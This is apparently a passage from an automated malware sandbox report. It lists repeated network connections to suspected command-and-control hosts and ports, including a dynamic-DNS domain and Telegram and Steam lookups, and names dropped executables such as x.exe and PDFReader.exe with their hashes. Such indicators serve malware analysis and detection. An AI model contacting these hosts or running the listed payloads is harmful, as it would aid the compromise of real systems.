| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | newstaticfreepoint24.ddns-ip.net | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 8.8.8.8:53 | navegacionseguracol24vip.org | udp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:30203 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| FR | 82.64.156.123:80 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| GB | 104.82.234.109:443 | steamcommunity.com | tcp |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| FI | 37.27.43.98:443 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| NL | 149.154.167.99:443 | t.me | tcp |
| US | 154.216.18.132:6868 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| CO | 181.131.217.244:1842 | navegacionseguracol24vip.org | tcp |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 148.163.102.170:4782 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| N/A | 127.0.0.1:8777 | tcp | |
| US | 154.216.18.132:6868 | tcp | |
| FR | 82.64.156.123:80 | tcp |
Files
memory/1724-0-0x000007FEF5D33000-0x000007FEF5D34000-memory.dmp
memory/1724-1-0x0000000001250000-0x0000000001258000-memory.dmp
memory/1724-2-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp
memory/1724-12-0x000007FEF5D33000-0x000007FEF5D34000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\CabE820.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Temp\TarE842.tmp
| MD5 | 4ea6026cf93ec6338144661bf1202cd1 |
| SHA1 | a1dec9044f750ad887935a01430bf49322fbdcb7 |
| SHA256 | 8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8 |
| SHA512 | 6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b |
memory/1724-58-0x000007FEF5D30000-0x000007FEF671C000-memory.dmp
memory/880-66-0x0000000000400000-0x000000000068B000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\TPB-1.exe
| MD5 | 760370c2aa2829b5fec688d12da0535f |
| SHA1 | 269f86ff2ce1eb1eeed20075f0b719ee779e8fbb |
| SHA256 | a3a6cde465591377afc5f656f72a00799398fd2541b60391bcb8f62b8f8cace3 |
| SHA512 | 1e63051694056ffcd3aa22edb2bef3bb30401edc784b82101f5dc7f69756b994e84e309a13bdb64b6e92516e895648ee34598de70e8882569d79dbfdab61a847 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
| MD5 | 71fde8aa6fae526c6a1f3c829fce07ee |
| SHA1 | 276c23a63424ba4763646327faf64f868c809fa6 |
| SHA256 | 9d0ad99c8b191592900d199674d300cf2a8beceb963d21c011a7ee07f6f7e7e2 |
| SHA512 | d294f5bbe92279e407fdd3586d8a7071ff0e45ce6d538f49bd4f12099718624074eb4aa6d817d0a1a58192731533e85dfe0a58de935041abd9d9210dcbbb0757 |
C:\Users\Admin\AppData\Local\Temp\a\TestExe.exe
| MD5 | 51aa89efb23c098b10293527e469c042 |
| SHA1 | dc81102e0c1bced6e1da055dab620316959d8e2a |
| SHA256 | 780f11f112fcf055a2f9d6b12ce3750aed7720b85528a7adaf114067446f4292 |
| SHA512 | 93230b7881a9141453c1c84e8f74085a150ce62ecd0acd80367cb16048cb9de67a7f99d1345602ad3ecd71fc2e159a4f17269f172dc7b60272f65d50e1b608fa |
memory/1488-162-0x0000000000810000-0x0000000000820000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\x.exe
| MD5 | f9a6811d7a9d5e06d73a68fc729ce66c |
| SHA1 | c882143d5fde4b2e7edb5a9accb534ba17d754ef |
| SHA256 | c583d0a367ecffa74b82b78116bbb04b7c92bed0300ed1c3adc4ef3250fbb9cc |
| SHA512 | 4dec52f0d1927306deda677fea46d103b052aaa5f7d7f49abe59a3618110ee542c2db385158a393970751fcc9687efe44a860d6330ed474c0c849369c0da56df |
memory/2156-169-0x0000000001150000-0x0000000001160000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\a\PDFReader.exe
| MD5 | ddce3b9704d1e4236548b1a458317dd0 |
| SHA1 | a48a65dbcba5a65d89688e1b4eac0deef65928c8 |
| SHA256 | 972f3d714d2a17e1e4d524c97cf8a283728dc8cf8ea4f2c39bf005cfcd3e71ce |
| SHA512 | 5e99897810377570cc29f0a066d4f31e05790b10d8a479dd8e358477cc7317bccd4d67c5936edfdca5f6385bd0587ba43b626bfc919cb12330facf3fa8893e86 |
memory/1748-182-0x000000001B730000-0x000000001BA12000-memory.dmp
memory/1748-186-0x00000000028E0000-0x00000000028EA000-memory.dmp
memory/1748-185-0x000000001BA70000-0x000000001BAB6000-memory.dmp
memory/1748-184-0x0000000002840000-0x000000000284E000-memory.dmp
memory/1748-183-0x0000000001F80000-0x0000000001F88000-memory.dmp
